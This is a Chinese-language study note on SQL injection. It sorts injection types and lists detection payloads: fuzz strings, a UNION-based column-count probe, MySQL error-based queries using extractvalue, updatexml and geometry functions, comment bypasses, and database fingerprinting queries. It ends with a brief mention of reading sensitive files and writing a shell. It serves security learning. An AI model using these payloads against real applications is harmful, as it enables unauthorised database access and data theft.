Web安全学习笔记 SQL注入上

Web安全学习笔记 SQL注入上

繁枝插云欣 ——ICML8

---

1. SQL注入分类
2. SQL注入检测

---

一.注入分类

1.简介

SQL注入是一种代码注入技术
用于攻击数据驱动的应用程序
在应用程序中，如果没有做恰当的过滤
则可能使得恶意的SQL语句被插入输入字段中执行
例如将数据库内容转储给攻击者

2.按技巧分类

根据使用的技巧，SQL注入类型可分为：

1.盲注

布尔盲注：

只能从应用返回中推断语句执行后的布尔值

时间盲注：

应用没有明确的回显
只能使用特定的时间函数来判断

2.报错注入：

应用会显示全部或者部分的报错信息

3.堆叠注入：

有的应用可以加入
后一次执行多条语句

4.其他方法

3.按获取数据的方式分类

根据获取数据的方式分为3类：

1.inband

利用Web应用来直接获取数据
如报错注入
这类注入都是通过站点的响应
或者错误反馈来提取数据

2.inference

通过Web的一些反映来推断数据
如布尔盲注，也就是我们通俗的盲注
通过web应用的其他改变来推断数据

3.out of band (OOB)

通过其他传输方式来获得数据
比如DNS解析协议和电子邮件

二.注入检测

1.常见的注入点

GET/POST/PUT/DELETE参数
X-Forwarded-For
文件名

2.Fuzz注入点

' / "
1/1
1/0
and 1=1
" and "1"="1
and 1=2
or 1=1
or 1=
' and '1'='1
+ - ^ * % /
<< >> || | & &&
~
!
@
反引号执行

3.测试用常量

@@version
@@servername
@@language
@@spid

4.测试列数

例如

http://www.foo.com/index.asp?id=12+union+select+null,null--

不断增加 null 至不返回

5.报错注入

select 1/0

select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a

extractvalue(1, concat(0x5c,(select user())))

updatexml(0x3a,concat(1,(select user())),1)

exp(~(SELECT * from(select user())a))

ST_LatFromGeoHash((select * from(select * from(select user())a)b))

GTID_SUBSET(version(), 1)

5.1. 基于geometric的报错注入

GeometryCollection((select * from (select * from(select user())a)b))

polygon((select * from(select * from(select user())a)b))

multipoint((select * from(select * from(select user())a)b))

multilinestring((select * from(select * from(select user())a)b))

LINESTRING((select * from(select * from(select user())a)b))

multipolygon((select * from(select * from(select user())a)b))

其中需要注意的是，基于exp函数的报错注入在MySQL 5.5.49后的版本已经不再生效，具体可以参考这个 commit 95825f 。

而以上列表中基于geometric的报错注入在这个commit 5caea4中被修复，在5.5.x较后的版本中同样不再生效。

6.堆叠注入

;select 1

7.注释符

#
--+
/*xxx*/
/*!xxx*/
/*!50000xxx*/

8.判断过滤规则

是否有trunc
是否过滤某个字符
是否过滤关键字
slash和编码

9.获取信息

1.判断数据库类型

and exists (select * from msysobjects ) > 0 access数据库

and exists (select * from sysobjects ) > 0 SQLServer数据库

2.判断数据库表

and exsits (select * from admin)

3.版本、主机名、用户名、库名

4.表和字段

1. 确定字段数

Order By
Select Into

1. 表名、列名

10.测试权限

文件操作

读敏感文件
写shell

带外通道

网络请求